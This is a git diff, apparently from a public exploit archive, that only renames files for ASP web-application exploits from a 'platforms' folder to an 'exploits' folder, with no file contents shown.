a/platforms/asp/webapps/28857.txt b/exploits/asp/webapps/28857.txt similarity index 100% rename from platforms/asp/webapps/28857.txt rename to exploits/asp/webapps/28857.txt diff --git a/platforms/asp/webapps/28869.txt b/exploits/asp/webapps/28869.txt similarity index 100% rename from platforms/asp/webapps/28869.txt rename to exploits/asp/webapps/28869.txt diff --git a/platforms/asp/webapps/28878.txt b/exploits/asp/webapps/28878.txt similarity index 100% rename from platforms/asp/webapps/28878.txt rename to exploits/asp/webapps/28878.txt diff --git a/platforms/asp/webapps/28879.txt b/exploits/asp/webapps/28879.txt similarity index 100% rename from platforms/asp/webapps/28879.txt rename to exploits/asp/webapps/28879.txt diff --git a/platforms/asp/webapps/28941.txt b/exploits/asp/webapps/28941.txt similarity index 100% rename from platforms/asp/webapps/28941.txt rename to exploits/asp/webapps/28941.txt diff --git a/platforms/asp/webapps/28985.txt b/exploits/asp/webapps/28985.txt similarity index 100% rename from platforms/asp/webapps/28985.txt rename to exploits/asp/webapps/28985.txt diff --git a/platforms/asp/webapps/28986.asp b/exploits/asp/webapps/28986.asp similarity index 100% rename from platforms/asp/webapps/28986.asp rename to exploits/asp/webapps/28986.asp diff --git a/platforms/asp/webapps/28989.txt b/exploits/asp/webapps/28989.txt similarity index 100% rename from platforms/asp/webapps/28989.txt rename to exploits/asp/webapps/28989.txt diff --git a/platforms/asp/webapps/28990.txt b/exploits/asp/webapps/28990.txt similarity index 100% rename from platforms/asp/webapps/28990.txt rename to exploits/asp/webapps/28990.txt diff --git a/platforms/asp/webapps/28991.txt b/exploits/asp/webapps/28991.txt similarity index 100% rename from platforms/asp/webapps/28991.txt rename to exploits/asp/webapps/28991.txt diff --git a/platforms/asp/webapps/28992.txt b/exploits/asp/webapps/28992.txt similarity index 100% rename from platforms/asp/webapps/28992.txt rename to exploits/asp/webapps/28992.txt diff --git a/platforms/asp/webapps/28993.txt b/exploits/asp/webapps/28993.txt similarity index 100% rename from platforms/asp/webapps/28993.txt rename to exploits/asp/webapps/28993.txt diff --git a/platforms/asp/webapps/28994.txt b/exploits/asp/webapps/28994.txt similarity index 100% rename from platforms/asp/webapps/28994.txt rename to exploits/asp/webapps/28994.txt diff --git a/platforms/asp/webapps/29008.txt b/exploits/asp/webapps/29008.txt similarity index 100% rename from platforms/asp/webapps/29008.txt rename to exploits/asp/webapps/29008.txt diff --git a/platforms/asp/webapps/29009.txt b/exploits/asp/webapps/29009.txt similarity index 100% rename from platforms/asp/webapps/29009.txt rename to exploits/asp/webapps/29009.txt diff --git a/platforms/asp/webapps/29010.txt b/exploits/asp/webapps/29010.txt similarity index 100% rename from platforms/asp/webapps/29010.txt rename to exploits/asp/webapps/29010.txt diff --git a/platforms/asp/webapps/29011.txt b/exploits/asp/webapps/29011.txt similarity index 100% rename from platforms/asp/webapps/29011.txt rename to exploits/asp/webapps/29011.txt diff --git a/platforms/asp/webapps/29012.txt b/exploits/asp/webapps/29012.txt similarity index 100% rename from platforms/asp/webapps/29012.txt rename to exploits/asp/webapps/29012.txt diff --git a/platforms/asp/webapps/29013.txt b/exploits/asp/webapps/29013.txt similarity index 100% rename from platforms/asp/webapps/29013.txt rename to exploits/asp/webapps/29013.txt diff --git a/platforms/asp/webapps/29014.txt b/exploits/asp/webapps/29014.txt similarity index 100% rename from platforms/asp/webapps/29014.txt rename to exploits/asp/webapps/29014.txt diff --git a/platforms/asp/webapps/29015.txt b/exploits/asp/webapps/29015.txt similarity index 100% rename from platforms/asp/webapps/29015.txt rename to exploits/asp/webapps/29015.txt diff --git a/platforms/asp/webapps/29016.txt b/exploits/asp/webapps/29016.txt similarity index 100% rename from platforms/asp/webapps/29016.txt rename to exploits/asp/webapps/29016.txt diff --git a/platforms/asp/webapps/29024.txt b/exploits/asp/webapps/29024.txt similarity index 100% rename from platforms/asp/webapps/29024.txt rename to exploits/asp/webapps/29024.txt diff --git a/platforms/asp/webapps/29025.txt b/exploits/asp/webapps/29025.txt similarity index 100% rename from platforms/asp/webapps/29025.txt rename to exploits/asp/webapps/29025.txt diff --git a/platforms/asp/webapps/29028.txt b/exploits/asp/webapps/29028.txt similarity index 100% rename from platforms/asp/webapps/29028.txt rename to exploits/asp/webapps/29028.txt diff --git a/platforms/asp/webapps/29029.txt b/exploits/asp/webapps/29029.txt similarity index 100% rename from platforms/asp/webapps/29029.txt rename to exploits/asp/webapps/29029.txt diff --git a/platforms/asp/webapps/29030.txt b/exploits/asp/webapps/29030.txt similarity index 100% rename from platforms/asp/webapps/29030.txt rename to exploits/asp/webapps/29030.txt diff --git a/platforms/asp/webapps/29031.txt b/exploits/asp/webapps/29031.txt similarity index 100% rename from platforms/asp/webapps/29031.txt rename to exploits/asp/webapps/29031.txt diff --git a/platforms/asp/webapps/29037.txt b/exploits/asp/webapps/29037.txt similarity index 100% rename from platforms/asp/webapps/29037.txt rename to exploits/asp/webapps/29037.txt diff --git a/platforms/asp/webapps/29038.txt b/exploits/asp/webapps/29038.txt similarity index 100% rename from platforms/asp/webapps/29038.txt rename to exploits/asp/webapps/29038.txt diff --git a/platforms/asp/webapps/29040.txt b/exploits/asp/webapps/29040.txt similarity index 100% rename from platforms/asp/webapps/29040.txt rename to exploits/asp/webapps/29040.txt diff --git a/platforms/asp/webapps/29041.txt b/exploits/asp/webapps/29041.txt similarity index 100% rename from platforms/asp/webapps/29041.txt rename to exploits/asp/webapps/29041.txt diff --git a/platforms/asp/webapps/29042.txt b/exploits/asp/webapps/29042.txt similarity index 100% rename from platforms/asp/webapps/29042.txt rename to exploits/asp/webapps/29042.txt diff --git a/platforms/asp/webapps/29043.txt b/exploits/asp/webapps/29043.txt similarity index 100% rename from platforms/asp/webapps/29043.txt rename to exploits/asp/webapps/29043.txt diff --git a/platforms/asp/webapps/29044.txt b/exploits/asp/webapps/29044.txt similarity index 100% rename from platforms/asp/webapps/29044.txt rename to exploits/asp/webapps/29044.txt diff --git a/platforms/asp/webapps/29046.txt b/exploits/asp/webapps/29046.txt similarity index 100% rename from platforms/asp/webapps/29046.txt rename to exploits/asp/webapps/29046.txt diff --git a/platforms/asp/webapps/29048.txt b/exploits/asp/webapps/29048.txt similarity index 100% rename from platforms/asp/webapps/29048.txt rename to exploits/asp/webapps/29048.txt diff --git a/platforms/asp/webapps/29053.txt b/exploits/asp/webapps/29053.txt similarity index 100% rename from platforms/asp/webapps/29053.txt rename to exploits/asp/webapps/29053.txt diff --git a/platforms/asp/webapps/29054.txt b/exploits/asp/webapps/29054.txt similarity index 100% rename from platforms/asp/webapps/29054.txt rename to exploits/asp/webapps/29054.txt diff --git a/platforms/asp/webapps/29063.txt b/exploits/asp/webapps/29063.txt similarity index 100% rename from platforms/asp/webapps/29063.txt rename to exploits/asp/webapps/29063.txt diff --git a/platforms/asp/webapps/29064.txt b/exploits/asp/webapps/29064.txt similarity index 100% rename from platforms/asp/webapps/29064.txt rename to exploits/asp/webapps/29064.txt diff --git a/platforms/asp/webapps/2907.txt b/exploits/asp/webapps/2907.txt similarity index 100% rename from platforms/asp/webapps/2907.txt rename to exploits/asp/webapps/2907.txt diff --git a/platforms/asp/webapps/29073.txt b/exploits/asp/webapps/29073.txt similarity index 100% rename from platforms/asp/webapps/29073.txt rename to exploits/asp/webapps/29073.txt diff --git a/platforms/asp/webapps/29074.txt b/exploits/asp/webapps/29074.txt similarity index 100% rename from platforms/asp/webapps/29074.txt rename to exploits/asp/webapps/29074.txt diff --git a/platforms/asp/webapps/29075.txt b/exploits/asp/webapps/29075.txt similarity index 100% rename from platforms/asp/webapps/29075.txt rename to exploits/asp/webapps/29075.txt diff --git a/platforms/asp/webapps/29077.txt b/exploits/asp/webapps/29077.txt similarity index 100% rename from platforms/asp/webapps/29077.txt rename to exploits/asp/webapps/29077.txt diff --git a/platforms/asp/webapps/29078.txt b/exploits/asp/webapps/29078.txt similarity index 100% rename from platforms/asp/webapps/29078.txt rename to exploits/asp/webapps/29078.txt diff --git a/platforms/asp/webapps/2908.txt b/exploits/asp/webapps/2908.txt similarity index 100% rename from platforms/asp/webapps/2908.txt rename to exploits/asp/webapps/2908.txt diff --git a/platforms/asp/webapps/29080.txt b/exploits/asp/webapps/29080.txt similarity index 100% rename from platforms/asp/webapps/29080.txt rename to exploits/asp/webapps/29080.txt diff --git a/platforms/asp/webapps/29081.txt b/exploits/asp/webapps/29081.txt similarity index 100% rename from platforms/asp/webapps/29081.txt rename to exploits/asp/webapps/29081.txt diff --git a/platforms/asp/webapps/29084.txt b/exploits/asp/webapps/29084.txt similarity index 100% rename from platforms/asp/webapps/29084.txt rename to exploits/asp/webapps/29084.txt diff --git a/platforms/asp/webapps/29085.txt b/exploits/asp/webapps/29085.txt similarity index 100% rename from platforms/asp/webapps/29085.txt rename to exploits/asp/webapps/29085.txt diff --git a/platforms/asp/webapps/29086.txt b/exploits/asp/webapps/29086.txt similarity index 100% rename from platforms/asp/webapps/29086.txt rename to exploits/asp/webapps/29086.txt diff --git a/platforms/asp/webapps/29087.txt b/exploits/asp/webapps/29087.txt similarity index 100% rename from platforms/asp/webapps/29087.txt rename to exploits/asp/webapps/29087.txt diff --git a/platforms/asp/webapps/29088.txt b/exploits/asp/webapps/29088.txt similarity index 100% rename from platforms/asp/webapps/29088.txt rename to exploits/asp/webapps/29088.txt diff --git a/platforms/asp/webapps/29089.txt b/exploits/asp/webapps/29089.txt similarity index 100% rename from platforms/asp/webapps/29089.txt rename to exploits/asp/webapps/29089.txt diff --git a/platforms/asp/webapps/2909.txt b/exploits/asp/webapps/2909.txt similarity index 100% rename from platforms/asp/webapps/2909.txt rename to exploits/asp/webapps/2909.txt diff --git a/platforms/asp/webapps/29090.txt b/exploits/asp/webapps/29090.txt similarity index 100% rename from platforms/asp/webapps/29090.txt rename to exploits/asp/webapps/29090.txt diff --git a/platforms/asp/webapps/29093.txt b/exploits/asp/webapps/29093.txt similarity index 100% rename from platforms/asp/webapps/29093.txt rename to exploits/asp/webapps/29093.txt diff --git a/platforms/asp/webapps/29094.txt b/exploits/asp/webapps/29094.txt similarity index 100% rename from platforms/asp/webapps/29094.txt rename to exploits/asp/webapps/29094.txt diff --git a/platforms/asp/webapps/29103.txt b/exploits/asp/webapps/29103.txt similarity index 100% rename from platforms/asp/webapps/29103.txt rename to exploits/asp/webapps/29103.txt diff --git a/platforms/asp/webapps/29104.txt b/exploits/asp/webapps/29104.txt similarity index 100% rename from platforms/asp/webapps/29104.txt rename to exploits/asp/webapps/29104.txt diff --git a/platforms/asp/webapps/29105.txt b/exploits/asp/webapps/29105.txt similarity index 100% rename from platforms/asp/webapps/29105.txt rename to exploits/asp/webapps/29105.txt diff --git a/platforms/asp/webapps/29106.txt b/exploits/asp/webapps/29106.txt similarity index 100% rename from platforms/asp/webapps/29106.txt rename to exploits/asp/webapps/29106.txt diff --git a/platforms/asp/webapps/29107.txt b/exploits/asp/webapps/29107.txt similarity index 100% rename from platforms/asp/webapps/29107.txt rename to exploits/asp/webapps/29107.txt diff --git a/platforms/asp/webapps/29108.txt b/exploits/asp/webapps/29108.txt similarity index 100% rename from platforms/asp/webapps/29108.txt rename to exploits/asp/webapps/29108.txt diff --git a/platforms/asp/webapps/29109.txt b/exploits/asp/webapps/29109.txt similarity index 100% rename from platforms/asp/webapps/29109.txt rename to exploits/asp/webapps/29109.txt diff --git a/platforms/asp/webapps/29110.txt b/exploits/asp/webapps/29110.txt similarity index 100% rename from platforms/asp/webapps/29110.txt rename to exploits/asp/webapps/29110.txt diff --git a/platforms/asp/webapps/29111.txt b/exploits/asp/webapps/29111.txt similarity index 100% rename from platforms/asp/webapps/29111.txt rename to exploits/asp/webapps/29111.txt diff --git a/platforms/asp/webapps/29112.txt b/exploits/asp/webapps/29112.txt similarity index 100% rename from platforms/asp/webapps/29112.txt rename to exploits/asp/webapps/29112.txt diff --git a/platforms/asp/webapps/29113.txt b/exploits/asp/webapps/29113.txt similarity index 100% rename from platforms/asp/webapps/29113.txt rename to exploits/asp/webapps/29113.txt diff --git a/platforms/asp/webapps/29114.txt b/exploits/asp/webapps/29114.txt similarity index 100% rename from platforms/asp/webapps/29114.txt rename to exploits/asp/webapps/29114.txt diff --git a/platforms/asp/webapps/29115.txt b/exploits/asp/webapps/29115.txt similarity index 100% rename from platforms/asp/webapps/29115.txt rename to exploits/asp/webapps/29115.txt diff --git a/platforms/asp/webapps/29116.txt b/exploits/asp/webapps/29116.txt similarity index 100% rename from platforms/asp/webapps/29116.txt rename to exploits/asp/webapps/29116.txt diff --git a/platforms/asp/webapps/29117.txt b/exploits/asp/webapps/29117.txt similarity index 100% rename from platforms/asp/webapps/29117.txt rename to exploits/asp/webapps/29117.txt diff --git a/platforms/asp/webapps/29118.txt b/exploits/asp/webapps/29118.txt similarity index 100% rename from platforms/asp/webapps/29118.txt rename to exploits/asp/webapps/29118.txt diff --git a/platforms/asp/webapps/29119.txt b/exploits/asp/webapps/29119.txt similarity index 100% rename from platforms/asp/webapps/29119.txt rename to exploits/asp/webapps/29119.txt diff --git a/platforms/asp/webapps/29120.txt b/exploits/asp/webapps/29120.txt similarity index 100% rename from platforms/asp/webapps/29120.txt rename to exploits/asp/webapps/29120.txt diff --git a/platforms/asp/webapps/29121.txt b/exploits/asp/webapps/29121.txt similarity index 100% rename from platforms/asp/webapps/29121.txt rename to exploits/asp/webapps/29121.txt diff --git a/platforms/asp/webapps/29122.txt b/exploits/asp/webapps/29122.txt similarity index 100% rename from platforms/asp/webapps/29122.txt rename to exploits/asp/webapps/29122.txt diff --git a/platforms/asp/webapps/29123.txt b/exploits/asp/webapps/29123.txt similarity index 100% rename from platforms/asp/webapps/29123.txt rename to exploits/asp/webapps/29123.txt diff --git a/platforms/asp/webapps/29124.txt b/exploits/asp/webapps/29124.txt similarity index 100% rename from platforms/asp/webapps/29124.txt rename to exploits/asp/webapps/29124.txt diff --git a/platforms/asp/webapps/29126.txt b/exploits/asp/webapps/29126.txt similarity index 100% rename from platforms/asp/webapps/29126.txt rename to exploits/asp/webapps/29126.txt diff --git a/platforms/asp/webapps/29133.txt b/exploits/asp/webapps/29133.txt similarity index 100% rename from platforms/asp/webapps/29133.txt rename to exploits/asp/webapps/29133.txt diff --git a/platforms/asp/webapps/29134.txt b/exploits/asp/webapps/29134.txt similarity index 100% rename from platforms/asp/webapps/29134.txt rename to exploits/asp/webapps/29134.txt diff --git a/platforms/asp/webapps/29135.txt b/exploits/asp/webapps/29135.txt similarity index 100% rename from platforms/asp/webapps/29135.txt rename to exploits/asp/webapps/29135.txt diff --git a/platforms/asp/webapps/29136.txt b/exploits/asp/webapps/29136.txt similarity index 100% rename from platforms/asp/webapps/29136.txt rename to exploits/asp/webapps/29136.txt diff --git a/platforms/asp/webapps/29137.txt b/exploits/asp/webapps/29137.txt similarity index 100% rename from platforms/asp/webapps/29137.txt rename to exploits/asp/webapps/29137.txt diff --git a/platforms/asp/webapps/29141.txt b/exploits/asp/webapps/29141.txt similarity index 100% rename from platforms/asp/webapps/29141.txt rename to exploits/asp/webapps/29141.txt diff --git a/platforms/asp/webapps/29142.txt b/exploits/asp/webapps/29142.txt similarity index 100% rename from platforms/asp/webapps/29142.txt rename to exploits/asp/webapps/29142.txt diff --git a/platforms/asp/webapps/29143.txt b/exploits/asp/webapps/29143.txt similarity index 100% rename from platforms/asp/webapps/29143.txt rename to exploits/asp/webapps/29143.txt diff --git a/platforms/asp/webapps/29151.txt b/exploits/asp/webapps/29151.txt similarity index 100% rename from platforms/asp/webapps/29151.txt rename to exploits/asp/webapps/29151.txt diff --git a/platforms/asp/webapps/29152.txt b/exploits/asp/webapps/29152.txt similarity index 100% rename from platforms/asp/webapps/29152.txt rename to exploits/asp/webapps/29152.txt diff --git a/platforms/asp/webapps/29153.txt b/exploits/asp/webapps/29153.txt similarity index 100% rename from platforms/asp/webapps/29153.txt rename to exploits/asp/webapps/29153.txt diff --git a/platforms/asp/webapps/29154.txt b/exploits/asp/webapps/29154.txt similarity index 100% rename from platforms/asp/webapps/29154.txt rename to exploits/asp/webapps/29154.txt diff --git a/platforms/asp/webapps/29155.txt b/exploits/asp/webapps/29155.txt similarity index 100% rename from platforms/asp/webapps/29155.txt rename to exploits/asp/webapps/29155.txt diff --git a/platforms/asp/webapps/29156.txt b/exploits/asp/webapps/29156.txt similarity index 100% rename from platforms/asp/webapps/29156.txt rename to exploits/asp/webapps/29156.txt diff --git a/platforms/asp/webapps/29174.txt b/exploits/asp/webapps/29174.txt similarity index 100% rename from platforms/asp/webapps/29174.txt rename to exploits/asp/webapps/29174.txt diff --git a/platforms/asp/webapps/29176.txt b/exploits/asp/webapps/29176.txt similarity index 100% rename from platforms/asp/webapps/29176.txt rename to exploits/asp/webapps/29176.txt diff --git a/platforms/asp/webapps/29178.txt b/exploits/asp/webapps/29178.txt similarity index 100% rename from platforms/asp/webapps/29178.txt rename to exploits/asp/webapps/29178.txt diff --git a/platforms/asp/webapps/29179.txt b/exploits/asp/webapps/29179.txt similarity index 100% rename from platforms/asp/webapps/29179.txt rename to exploits/asp/webapps/29179.txt diff --git a/platforms/asp/webapps/29180.txt b/exploits/asp/webapps/29180.txt similarity index 100% rename from platforms/asp/webapps/29180.txt rename to exploits/asp/webapps/29180.txt diff --git a/platforms/asp/webapps/29189.txt b/exploits/asp/webapps/29189.txt similarity index 100% rename from platforms/asp/webapps/29189.txt rename to exploits/asp/webapps/29189.txt diff --git a/platforms/asp/webapps/29191.txt b/exploits/asp/webapps/29191.txt similarity index 100% rename from platforms/asp/webapps/29191.txt rename to exploits/asp/webapps/29191.txt diff --git a/platforms/asp/webapps/29192.txt b/exploits/asp/webapps/29192.txt similarity index 100% rename from platforms/asp/webapps/29192.txt rename to exploits/asp/webapps/29192.txt diff --git a/platforms/asp/webapps/29193.txt b/exploits/asp/webapps/29193.txt similarity index 100% rename from platforms/asp/webapps/29193.txt rename to exploits/asp/webapps/29193.txt diff --git a/platforms/asp/webapps/29195.txt b/exploits/asp/webapps/29195.txt similarity index 100% rename from platforms/asp/webapps/29195.txt rename to exploits/asp/webapps/29195.txt diff --git a/platforms/asp/webapps/29196.txt b/exploits/asp/webapps/29196.txt similarity index 100% rename from platforms/asp/webapps/29196.txt rename to exploits/asp/webapps/29196.txt diff --git a/platforms/asp/webapps/29197.txt b/exploits/asp/webapps/29197.txt similarity index 100% rename from platforms/asp/webapps/29197.txt rename to exploits/asp/webapps/29197.txt diff --git a/platforms/asp/webapps/29216.html b/exploits/asp/webapps/29216.html similarity index 100% rename from platforms/asp/webapps/29216.html rename to exploits/asp/webapps/29216.html diff --git a/platforms/asp/webapps/29219.txt b/exploits/asp/webapps/29219.txt similarity index 100% rename from platforms/asp/webapps/29219.txt rename to exploits/asp/webapps/29219.txt diff --git a/platforms/asp/webapps/29220.html b/exploits/asp/webapps/29220.html similarity index 100% rename from platforms/asp/webapps/29220.html rename to exploits/asp/webapps/29220.html diff --git a/platforms/asp/webapps/29224.txt b/exploits/asp/webapps/29224.txt similarity index 100% rename from platforms/asp/webapps/29224.txt rename to exploits/asp/webapps/29224.txt diff --git a/platforms/asp/webapps/29227.txt b/exploits/asp/webapps/29227.txt similarity index 100% rename from platforms/asp/webapps/29227.txt rename to exploits/asp/webapps/29227.txt diff --git a/platforms/asp/webapps/29228.txt b/exploits/asp/webapps/29228.txt similarity index 100% rename from platforms/asp/webapps/29228.txt rename to exploits/asp/webapps/29228.txt diff --git a/platforms/asp/webapps/29231.txt b/exploits/asp/webapps/29231.txt similarity index 100% rename from platforms/asp/webapps/29231.txt rename to exploits/asp/webapps/29231.txt diff --git a/platforms/asp/webapps/29240.txt b/exploits/asp/webapps/29240.txt similarity index 100% rename from platforms/asp/webapps/29240.txt rename to exploits/asp/webapps/29240.txt diff --git a/platforms/asp/webapps/29241.txt b/exploits/asp/webapps/29241.txt similarity index 100% rename from platforms/asp/webapps/29241.txt rename to exploits/asp/webapps/29241.txt diff --git a/platforms/asp/webapps/29271.txt b/exploits/asp/webapps/29271.txt similarity index 100% rename from platforms/asp/webapps/29271.txt rename to exploits/asp/webapps/29271.txt diff --git a/platforms/asp/webapps/29276.txt b/exploits/asp/webapps/29276.txt similarity index 100% rename from platforms/asp/webapps/29276.txt rename to exploits/asp/webapps/29276.txt diff --git a/platforms/asp/webapps/29288.txt b/exploits/asp/webapps/29288.txt similarity index 100% rename from platforms/asp/webapps/29288.txt rename to exploits/asp/webapps/29288.txt diff --git a/platforms/asp/webapps/29293.txt b/exploits/asp/webapps/29293.txt similarity index 100% rename from platforms/asp/webapps/29293.txt rename to exploits/asp/webapps/29293.txt diff --git a/platforms/asp/webapps/29333.txt b/exploits/asp/webapps/29333.txt similarity index 100% rename from platforms/asp/webapps/29333.txt rename to exploits/asp/webapps/29333.txt diff --git a/platforms/asp/webapps/29336.txt b/exploits/asp/webapps/29336.txt similarity index 100% rename from platforms/asp/webapps/29336.txt rename to exploits/asp/webapps/29336.txt diff --git a/platforms/asp/webapps/29357.txt b/exploits/asp/webapps/29357.txt similarity index 100% rename from platforms/asp/webapps/29357.txt rename to exploits/asp/webapps/29357.txt diff --git a/platforms/asp/webapps/29358.txt b/exploits/asp/webapps/29358.txt similarity index 100% rename from platforms/asp/webapps/29358.txt rename to exploits/asp/webapps/29358.txt diff --git a/platforms/asp/webapps/29359.txt b/exploits/asp/webapps/29359.txt similarity index 100% rename from platforms/asp/webapps/29359.txt rename to exploits/asp/webapps/29359.txt diff --git a/platforms/asp/webapps/29360.txt b/exploits/asp/webapps/29360.txt similarity index 100% rename from platforms/asp/webapps/29360.txt rename to exploits/asp/webapps/29360.txt diff --git a/platforms/asp/webapps/29361.txt b/exploits/asp/webapps/29361.txt similarity index 100% rename from platforms/asp/webapps/29361.txt rename to exploits/asp/webapps/29361.txt diff --git a/platforms/asp/webapps/29373.txt b/exploits/asp/webapps/29373.txt similarity index 100% rename from platforms/asp/webapps/29373.txt rename to exploits/asp/webapps/29373.txt diff --git a/platforms/asp/webapps/29385.txt b/exploits/asp/webapps/29385.txt similarity index 100% rename from platforms/asp/webapps/29385.txt rename to exploits/asp/webapps/29385.txt diff --git a/platforms/asp/webapps/29398.txt b/exploits/asp/webapps/29398.txt similarity index 100% rename from platforms/asp/webapps/29398.txt rename to exploits/asp/webapps/29398.txt diff --git a/platforms/asp/webapps/29401.txt b/exploits/asp/webapps/29401.txt similarity index 100% rename from platforms/asp/webapps/29401.txt rename to exploits/asp/webapps/29401.txt diff --git a/platforms/asp/webapps/29456.txt b/exploits/asp/webapps/29456.txt similarity index 100% rename from platforms/asp/webapps/29456.txt rename to exploits/asp/webapps/29456.txt diff --git a/platforms/asp/webapps/29457.txt b/exploits/asp/webapps/29457.txt similarity index 100% rename from platforms/asp/webapps/29457.txt rename to exploits/asp/webapps/29457.txt diff --git a/platforms/asp/webapps/29500.txt b/exploits/asp/webapps/29500.txt similarity index 100% rename from platforms/asp/webapps/29500.txt rename to exploits/asp/webapps/29500.txt diff --git a/platforms/asp/webapps/29533.html b/exploits/asp/webapps/29533.html similarity index 100% rename from platforms/asp/webapps/29533.html rename to exploits/asp/webapps/29533.html diff --git a/platforms/asp/webapps/29596.txt b/exploits/asp/webapps/29596.txt similarity index 100% rename from platforms/asp/webapps/29596.txt rename to exploits/asp/webapps/29596.txt diff --git a/platforms/asp/webapps/29597.txt b/exploits/asp/webapps/29597.txt similarity index 100% rename from platforms/asp/webapps/29597.txt rename to exploits/asp/webapps/29597.txt diff --git a/platforms/asp/webapps/29600.txt b/exploits/asp/webapps/29600.txt similarity index 100% rename from platforms/asp/webapps/29600.txt rename to exploits/asp/webapps/29600.txt diff --git a/platforms/asp/webapps/29601.txt b/exploits/asp/webapps/29601.txt similarity index 100% rename from platforms/asp/webapps/29601.txt rename to exploits/asp/webapps/29601.txt diff --git a/platforms/asp/webapps/29611.txt b/exploits/asp/webapps/29611.txt similarity index 100% rename from platforms/asp/webapps/29611.txt rename to exploits/asp/webapps/29611.txt diff --git a/platforms/asp/webapps/2962.txt b/exploits/asp/webapps/2962.txt similarity index 100% rename from platforms/asp/webapps/2962.txt rename to exploits/asp/webapps/2962.txt diff --git a/platforms/asp/webapps/29622.txt b/exploits/asp/webapps/29622.txt similarity index 100% rename from platforms/asp/webapps/29622.txt rename to exploits/asp/webapps/29622.txt diff --git a/platforms/asp/webapps/2963.txt b/exploits/asp/webapps/2963.txt similarity index 100% rename from platforms/asp/webapps/2963.txt rename to exploits/asp/webapps/2963.txt diff --git a/platforms/asp/webapps/29675.txt b/exploits/asp/webapps/29675.txt similarity index 100% rename from platforms/asp/webapps/29675.txt rename to exploits/asp/webapps/29675.txt diff --git a/platforms/asp/webapps/29726.pl b/exploits/asp/webapps/29726.pl similarity index 100% rename from platforms/asp/webapps/29726.pl rename to exploits/asp/webapps/29726.pl diff --git a/platforms/asp/webapps/29817.txt b/exploits/asp/webapps/29817.txt similarity index 100% rename from platforms/asp/webapps/29817.txt rename to exploits/asp/webapps/29817.txt diff --git a/platforms/asp/webapps/2986.txt b/exploits/asp/webapps/2986.txt similarity index 100% rename from platforms/asp/webapps/2986.txt rename to exploits/asp/webapps/2986.txt diff --git a/platforms/asp/webapps/2987.txt b/exploits/asp/webapps/2987.txt similarity index 100% rename from platforms/asp/webapps/2987.txt rename to exploits/asp/webapps/2987.txt diff --git a/platforms/asp/webapps/2988.pl b/exploits/asp/webapps/2988.pl similarity index 100% rename from platforms/asp/webapps/2988.pl rename to exploits/asp/webapps/2988.pl diff --git a/platforms/asp/webapps/2989.txt b/exploits/asp/webapps/2989.txt similarity index 100% rename from platforms/asp/webapps/2989.txt rename to exploits/asp/webapps/2989.txt diff --git a/platforms/asp/webapps/2990.pl b/exploits/asp/webapps/2990.pl similarity index 100% rename from platforms/asp/webapps/2990.pl rename to exploits/asp/webapps/2990.pl diff --git a/platforms/asp/webapps/2991.pl b/exploits/asp/webapps/2991.pl similarity index 100% rename from platforms/asp/webapps/2991.pl rename to exploits/asp/webapps/2991.pl diff --git a/platforms/asp/webapps/2992.txt b/exploits/asp/webapps/2992.txt similarity index 100% rename from platforms/asp/webapps/2992.txt rename to exploits/asp/webapps/2992.txt diff --git a/platforms/asp/webapps/29929.txt b/exploits/asp/webapps/29929.txt similarity index 100% rename from platforms/asp/webapps/29929.txt rename to exploits/asp/webapps/29929.txt diff --git a/platforms/asp/webapps/2993.txt b/exploits/asp/webapps/2993.txt similarity index 100% rename from platforms/asp/webapps/2993.txt rename to exploits/asp/webapps/2993.txt diff --git a/platforms/asp/webapps/29933.txt b/exploits/asp/webapps/29933.txt similarity index 100% rename from platforms/asp/webapps/29933.txt rename to exploits/asp/webapps/29933.txt diff --git a/platforms/asp/webapps/2994.html b/exploits/asp/webapps/2994.html similarity index 100% rename from platforms/asp/webapps/2994.html rename to exploits/asp/webapps/2994.html diff --git a/platforms/asp/webapps/2995.html b/exploits/asp/webapps/2995.html similarity index 100% rename from platforms/asp/webapps/2995.html rename to exploits/asp/webapps/2995.html diff --git a/platforms/asp/webapps/29958.txt b/exploits/asp/webapps/29958.txt similarity index 100% rename from platforms/asp/webapps/29958.txt rename to exploits/asp/webapps/29958.txt diff --git a/platforms/asp/webapps/2996.html b/exploits/asp/webapps/2996.html similarity index 100% rename from platforms/asp/webapps/2996.html rename to exploits/asp/webapps/2996.html diff --git a/platforms/asp/webapps/2997.pl b/exploits/asp/webapps/2997.pl similarity index 100% rename from platforms/asp/webapps/2997.pl rename to exploits/asp/webapps/2997.pl diff --git a/platforms/asp/webapps/2998.pl b/exploits/asp/webapps/2998.pl similarity index 100% rename from platforms/asp/webapps/2998.pl rename to exploits/asp/webapps/2998.pl diff --git a/platforms/asp/webapps/3001.txt b/exploits/asp/webapps/3001.txt similarity index 100% rename from platforms/asp/webapps/3001.txt rename to exploits/asp/webapps/3001.txt diff --git a/platforms/asp/webapps/30048.html b/exploits/asp/webapps/30048.html similarity index 100% rename from platforms/asp/webapps/30048.html rename to exploits/asp/webapps/30048.html diff --git a/platforms/asp/webapps/30077.txt b/exploits/asp/webapps/30077.txt similarity index 100% rename from platforms/asp/webapps/30077.txt rename to exploits/asp/webapps/30077.txt diff --git a/platforms/asp/webapps/30141.txt b/exploits/asp/webapps/30141.txt similarity index 100% rename from platforms/asp/webapps/30141.txt rename to exploits/asp/webapps/30141.txt diff --git a/platforms/asp/webapps/3015.pl b/exploits/asp/webapps/3015.pl similarity index 100% rename from platforms/asp/webapps/3015.pl rename to exploits/asp/webapps/3015.pl diff --git a/platforms/asp/webapps/30159.txt b/exploits/asp/webapps/30159.txt similarity index 100% rename from platforms/asp/webapps/30159.txt rename to exploits/asp/webapps/30159.txt diff --git a/platforms/asp/webapps/30165.txt b/exploits/asp/webapps/30165.txt similarity index 100% rename from platforms/asp/webapps/30165.txt rename to exploits/asp/webapps/30165.txt diff --git a/platforms/asp/webapps/30198.txt b/exploits/asp/webapps/30198.txt similarity index 100% rename from platforms/asp/webapps/30198.txt rename to exploits/asp/webapps/30198.txt diff --git a/platforms/asp/webapps/30203.txt b/exploits/asp/webapps/30203.txt similarity index 100% rename from platforms/asp/webapps/30203.txt rename to exploits/asp/webapps/30203.txt diff --git a/platforms/asp/webapps/30204.txt b/exploits/asp/webapps/30204.txt similarity index 100% rename from platforms/asp/webapps/30204.txt rename to exploits/asp/webapps/30204.txt diff --git a/platforms/asp/webapps/30205.txt b/exploits/asp/webapps/30205.txt similarity index 100% rename from platforms/asp/webapps/30205.txt rename to exploits/asp/webapps/30205.txt diff --git a/platforms/asp/webapps/30207.txt b/exploits/asp/webapps/30207.txt similarity index 100% rename from platforms/asp/webapps/30207.txt rename to exploits/asp/webapps/30207.txt diff --git a/platforms/asp/webapps/30250.txt b/exploits/asp/webapps/30250.txt similarity index 100% rename from platforms/asp/webapps/30250.txt rename to 